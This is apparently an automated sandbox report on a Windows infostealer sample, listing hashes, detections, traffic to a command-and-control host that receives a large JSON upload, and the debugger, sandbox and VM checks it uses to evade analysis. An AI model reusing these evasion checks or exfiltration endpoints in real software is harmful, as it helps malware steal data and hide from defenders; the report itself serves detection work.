Windows Analysis Report
yqUQPPp0LM.exe

Overview

General Information

Sample name: yqUQPPp0LM.exe
renamed because original name is a hash value
Original sample name: 00dacdc02143f49ba6542161592fea9d.exe
Analysis ID: 1582700
MD5: 00dacdc02143f49ba6542161592fea9d
SHA1: cf9c6420db557dad6b86ca800d14cb8cba120657
SHA256: be0554ab88f46d8e6b10243d7b28ae2ce724b43224af3954b62d015693089822
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • yqUQPPp0LM.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\yqUQPPp0LM.exe" MD5: 00DACDC02143F49BA6542161592FEA9D)
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: yqUQPPp0LM.exeAvira: detected
Source: yqUQPPp0LM.exeVirustotal: Detection: 46%
Source: yqUQPPp0LM.exeReversingLabs: Detection: 65%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: yqUQPPp0LM.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0085DCF0
Source: yqUQPPp0LM.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0089A5B0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0089B560
Source: yqUQPPp0LM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0083255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0083255D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008329FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 502551
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008FA8C0 recvfrom,0_2_008FA8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:45:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: close Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:45:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: close Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
Source: yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZE_.u
Source: yqUQPPp0LM.exe, 00000000.00000002.2471420475.0000000001AFE000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: yqUQPPp0LM.exe, 00000000.00000002.2471420475.0000000001AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4
Source: yqUQPPp0LM.exe, 00000000.00000003.2449438646.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471521100.0000000001B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: yqUQPPp0LM.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: yqUQPPp0LM.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: yqUQPPp0LM.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443

System Summary

Source: yqUQPPp0LM.exeStatic PE information: section name:
Source: yqUQPPp0LM.exeStatic PE information: section name: .idata
Source: yqUQPPp0LM.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 009E7220 appears 93 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 00875340 appears 50 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 00874F40 appears 346 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 0084CCD0 appears 55 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 008375A0 appears 710 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 00A0CBC0 appears 104 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 0084CD40 appears 80 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 008750A0 appears 101 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 0083CAA0 appears 64 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 008371E0 appears 47 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 009144A0 appears 76 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 008373F0 appears 114 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 0083C960 appears 37 times
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: String function: 00874FD0 appears 289 times
Source: yqUQPPp0LM.exeStatic PE information: Section: ufmrywdo ZLIB complexity 0.9944913426650541
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@9/2
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: yqUQPPp0LM.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: yqUQPPp0LM.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeSection loaded: kernel.appcore.dll
Source: yqUQPPp0LM.exeStatic file information: File size 4472832 > 1048576
Source: yqUQPPp0LM.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: yqUQPPp0LM.exeStatic PE information: Raw size of ufmrywdo is bigger than: 0x100000 < 0x1b7400

Data Obfuscation

Source: C:\Users\user\Desktop\yqUQPPp0LM.exeUnpacked PE file: 0.2.yqUQPPp0LM.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ufmrywdo:EW;gqgzmhdq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ufmrywdo:EW;gqgzmhdq:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: yqUQPPp0LM.exeStatic PE information: real checksum: 0x4450c0 should be: 0x44872e
Source: yqUQPPp0LM.exeStatic PE information: section name:
Source: yqUQPPp0LM.exeStatic PE information: section name: .idata
Source: yqUQPPp0LM.exeStatic PE information: section name:
Source: yqUQPPp0LM.exeStatic PE information: section name: ufmrywdo
Source: yqUQPPp0LM.exeStatic PE information: section name: gqgzmhdq
Source: yqUQPPp0LM.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B921D0 push 0000004Ch; iretd 0_3_01B921F5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_3_01B9B120 push eax; retf 0_3_01B9B12D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_3_01B9B8A2 push FFFFFFB8h; iretd 0_3_01B9B8AB
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_3_01B97A7A push FFFFFFB8h; iretd 0_3_01B97A9D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_00BB41D0 push eax; mov dword ptr [esp], edx 0_2_00BB41D5
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_008B2340 push eax; mov dword ptr [esp], 00000000h 0_2_008B2343
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_008EC7F0 push eax; mov dword ptr [esp], 00000000h 0_2_008EC743
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_0088E92D push es; retf 0_2_0088E92E
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_00870AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00870AC4
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_00891430 push eax; mov dword ptr [esp], 00000000h 0_2_00891433
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_008B39A0 push eax; mov dword ptr [esp], 00000000h 0_2_008B39A3
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_0088DAD0 push eax; mov dword ptr [esp], edx 0_2_0088DAD1
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Code function: 0_2_00BB9F40 push dword ptr [eax+04h]; ret 0_2_00BB9F6F
Source: yqUQPPp0LM.exe | Static PE information: section name: ufmrywdo entropy: 7.956545640250439

Boot Survival

Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1134BF9 second address: 1134C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1134C06 second address: 1134C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1134C0A second address: 1134C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11379E4 second address: 11379E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1137B3C second address: 1137B8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, bx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 movzx edi, ax 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 mov dword ptr [ebp+12BD3A90h], ecx 0x00000026 mov eax, dword ptr [ebp+12A30305h] 0x0000002c jno 00007FE908EE710Ch 0x00000032 push FFFFFFFFh 0x00000034 clc 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 push esi 0x0000003a pop esi 0x0000003b pop ebx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1137B8C second address: 1137B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D653Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113A760 second address: 113A765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113B95D second address: 113B970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE9093D653Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113BA78 second address: 113BA90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FE908EE710Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113D92E second address: 113D966 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE9093D6538h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pop esi 0x00000011 nop 0x00000012 and ebx, dword ptr [ebp+12A31865h] 0x00000018 push 00000000h 0x0000001a jnp 00007FE9093D6539h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 or dword ptr [ebp+12BB2F60h], eax 0x00000029 pop ebx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f pop eax 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113D966 second address: 113D96C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113BA90 second address: 113BA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113BA9B second address: 113BA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113EA48 second address: 113EA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113EA4C second address: 113EA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113EA50 second address: 113EA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113FA57 second address: 113FA5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113FA5D second address: 113FA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E839B second address: 10E83AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FE908EE710Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E83AF second address: 10E83B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C1C second address: 1149C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C20 second address: 1149C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C28 second address: 1149C41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FE908EE7106h 0x00000009 pop esi 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FE908EE7106h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C41 second address: 1149C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C45 second address: 1149C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FE908EE7106h 0x0000000f jmp 00007FE908EE710Dh 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C65 second address: 1149C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149DB1 second address: 1149DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149EDA second address: 1149EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE9093D6536h 0x0000000a popad 0x0000000b rdtsc
